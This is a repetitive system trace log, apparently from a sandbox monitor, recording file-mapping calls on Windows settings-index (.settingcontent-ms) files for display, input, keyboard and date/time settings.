Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_Set.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_Set.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Device_Add.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Device_Add.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Brightness.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Brightness.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Duplicate.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Duplicate.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Monitors.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Monitors.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Orientation.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Orientation.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
